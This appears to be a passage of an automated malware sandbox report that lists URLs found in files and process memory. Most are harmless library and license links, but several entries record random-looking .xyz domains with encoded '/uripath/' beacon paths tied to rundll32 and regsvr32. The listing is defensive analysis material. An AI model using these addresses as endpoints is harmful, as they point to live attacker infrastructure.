            Source: potec.core.min[1].js.12.drString found in binary or memory: zh.prototype.f=function(){var a=this;this.url=z.R(this.a,"data-url")||window.location.href;this.Md="menubar\x3dno,toolbar\x3dno,resizable\x3dyes,scrollbars\x3dyes,height\x3d500,width\x3d500";this.a.find("[data-social]").b("click",function(b){b.preventDefault();switch(this.getAttribute("data-social")){case "facebook":window.open("https://www.facebook.com/sharer/sharer.php?u\x3d"+(0,window.encodeURIComponent)(a.url),"",a.Md);break;case "twitter":window.open("https://twitter.com/intent/tweet?text\x3d"+(0,window.encodeURIComponent)(window.document.title)+ equals www.facebook.com (Facebook)
            Source: potec.core.min[1].js.12.drString found in binary or memory: zh.prototype.f=function(){var a=this;this.url=z.R(this.a,"data-url")||window.location.href;this.Md="menubar\x3dno,toolbar\x3dno,resizable\x3dyes,scrollbars\x3dyes,height\x3d500,width\x3d500";this.a.find("[data-social]").b("click",function(b){b.preventDefault();switch(this.getAttribute("data-social")){case "facebook":window.open("https://www.facebook.com/sharer/sharer.php?u\x3d"+(0,window.encodeURIComponent)(a.url),"",a.Md);break;case "twitter":window.open("https://twitter.com/intent/tweet?text\x3d"+(0,window.encodeURIComponent)(window.document.title)+ equals www.twitter.com (Twitter)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://24ways.org/2010/calculating-color-contrast
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://chartjs.org/
            Source: animate[1].css.34.drString found in binary or memory: http://daneden.me/animate
            Source: style[1].css.34.drString found in binary or memory: http://demos.jeweltheme.com/Sufee-Admin/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://dev.w3.org/csswg/css-color/#hwb-to-rgb
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://docs.closure-library.googlecode.com/git/closure_goog_date_date.js.source.html
            Source: font-awesome.min[1].css.34.dr, fontawesome-webfont[1].eot.34.drString found in binary or memory: http://fontawesome.io
            Source: font-awesome.min[1].css.34.drString found in binary or memory: http://fontawesome.io/license
            Source: fontawesome-webfont[1].eot.34.drString found in binary or memory: http://fontawesome.io/license/
            Source: fontawesome-webfont[1].eot.34.drString found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
            Source: jquery.vmap[1].js.34.drString found in binary or memory: http://jqvmap.com
            Source: head.min[1].js.12.drString found in binary or memory: http://modernizr.com/download/?-csstransforms-csstransforms3d-csstransitions-flexbox-flexboxlegacy-f
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://momentjs.com/docs/#/displaying/format/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://momentjs.com/docs/#/get-set/iso-weekday/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://momentjs.com/docs/#/parsing/string-format/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://momentjs.com/guides/#/warnings/add-inverted-param/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://momentjs.com/guides/#/warnings/define-locale/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://momentjs.com/guides/#/warnings/dst-shifted/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://momentjs.com/guides/#/warnings/js-date/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://momentjs.com/guides/#/warnings/min-max/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://momentjs.com/guides/#/warnings/zone/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://nnnick.github.io/Chart.js/docs-v2/#scales-time-scale
            Source: de-ch[1].htm.7.drString found in binary or memory: http://ogp.me/ns#
            Source: de-ch[1].htm.7.drString found in binary or memory: http://ogp.me/ns/fb#
            Source: animate[1].css.34.drString found in binary or memory: http://opensource.org/licenses/MIT
            Source: popper.min[1].js.34.drString found in binary or memory: http://opensource.org/licenses/MIT).
            Source: auction[1].htm.7.drString found in binary or memory: http://popup.taboola.com/german
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/
            Source: imagestore.dat.4.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/favicon.ico
            Source: imagestore.dat.4.dr, imagestore.dat.34.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/favicon.ico~
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/css/bootstrap.min.css?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/css/cs-skin-elastic.css?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/css/flag-icon.min.css?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/css/font-awesome.min.css?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/css/lib/vector-map/jqvmap.min.css?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/css/normalize.css?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/css/scss/style.css?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/css/themify-icons.css?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/images/
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/dashboard.js?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/lib/chart-js/Chart.bundle.js?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/lib/vector-map/country/jquery.vmap.world.js?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/lib/vector-map/jquery.vmap.js?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/lib/vector-map/jquery.vmap.min.js?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/lib/vector-map/jquery.vmap.sampledata.js?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/main.js?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/plugins.js?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/vendor/jquery-2.1.4.min.js?1234
            Source: UCHp[1].htm.37.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/public/scripts/widgets.js?1234
            Source: {92DF17F9-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/uripath/HqAo_2FUT4Xi/etL7dOp10vF/1GZyviLFWjPlf_/2BpAjw1ynkMPMDMMcYEt
            Source: {8C619BE6-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzp
            Source: rundll32.exe, 00000003.00000003.381489488.0000000000824000.00000004.00000001.sdmp, ~DF011B873B6312514B.TMP.4.dr, {99D19BCE-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/uripath/r_2F625JF8nc/Zl6uqWI71P7/1DbizOipbgp9jM/hoB3nCCm3H0vpt3zAF7Z
            Source: {92DF17F7-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://qtrweyuiopolkhgbjune.xyz/uripath/rfHWC41tNETdeQWjswyCogx/2GerTeq_2F/pTrbfZqC3HbPx0AC8/8PvaEEy
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://scaledinnovation.com/analytics/splines/aboutSplines.html
            Source: picturefill.min[1].js.12.drString found in binary or memory: http://scottjehl.github.io/picturefill
            Source: {681FC20B-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: plugins[1].js.34.drString found in binary or memory: http://simontabor.com/labs/toggles
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://stackoverflow.com/a/14853974
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://stackoverflow.com/questions/181348/instantiating-a-javascript-object-by-calling-prototype-con
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://stackoverflow.com/questions/3561493/is-there-a-regexp-escape-function-in-javascript
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://stackoverflow.com/questions/8506881/nice-label-algorithm-for-charts-with-minimum-ticks
            Source: style[1].css.34.drString found in binary or memory: http://themeforest.net/user/jewel_theme/portfolio
            Source: imagestore.dat.26.drString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/favicon.ico
            Source: imagestore.dat.26.dr, imagestore.dat.4.drString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/favicon.ico~
            Source: ~DFE02B631E4A1F5FD7.TMP.4.dr, {AEA9A10B-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/uripath/6vBwf5Sg/63VGZHA406Wp7f7jlCy24r7/UcVh3uhwQE/xWtNLCfmK_2BTsac
            Source: ~DFA1C09D42BCEB76DB.TMP.4.dr, {85A98998-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/uripath/Dpso2yRgb0Dyb/KAn6cCpr/gAmXw5kfG_2Bc9ne1cJuUpm/vIdHSfsVJ8/z1
            Source: {8C619BE4-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/uripath/E2bq2WZHjxXirUql/0j3wLqnWLhS_2FZ/sba7m_2B0uIP2xWYHL/1K7Ue7b7
            Source: ~DF5A41C26E9E6D5F33.TMP.4.dr, {85A9899A-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/uripath/PbAYRrZYAKQJ_2FiZxLfQe/0W3TmhG_2FKNb/HT1zWvSh/WsU1_2F6i0huFY
            Source: {7E44528A-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/uripath/WORqDY6_2BNfZ/KgWjiUUb/r87p6Orp_2Fmh0hHOaxhMMx/ttdOCXkBqo/vy
            Source: loaddll32.exe, 00000000.00000002.463206938.00000000024F0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.464440992.0000000003060000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.463017579.0000000002D40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.464798699.0000000002D60000.00000002.00000001.sdmpString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/uripath/m5zigbEwtRm5tbWTabSv7yN/5eir_2B9Vh/aKk3WnUnFcJEuyyua/AR
            Source: ~DFED2C91BDCEE80C22.TMP.4.dr, {A740FA18-C964-11EB-90E4-ECF4BB862DED}.dat.4.drString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/uripath/m5zigbEwtRm5tbWTabSv7yN/5eir_2B9Vh/aKk3WnUnFcJEuyyua/ARiRkfJ
            Source: loaddll32.exe, 00000000.00000002.463206938.00000000024F0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.464440992.0000000003060000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.463017579.0000000002D40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.464798699.0000000002D60000.00000002.00000001.sdmpString found in binary or memory: http://vhfkffjddyjunekugjtr.xyz/uripath/sB8E3aa3L/XDVMq5XKI78tf7sk_2Ff/1uvfkmsySV_2FdyZgAj/rQ7f
            Source: permission-core.min[1].js.10.dr, webfont[1].js.12.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: style[1].css.34.drString found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html
            Source: 52-478955-68ddb2ab[1].js.7.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://www.html5canvastutorials.com/advanced/html5-canvas-mouse-coordinates/
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://www.nathanaeljones.com/blog/2013/reading-max-width-cross-browser
            Source: Chart.bundle[1].js.34.drString found in binary or memory: http://www.paulirish.com/2011/requestanimationframe-for-smart-animating/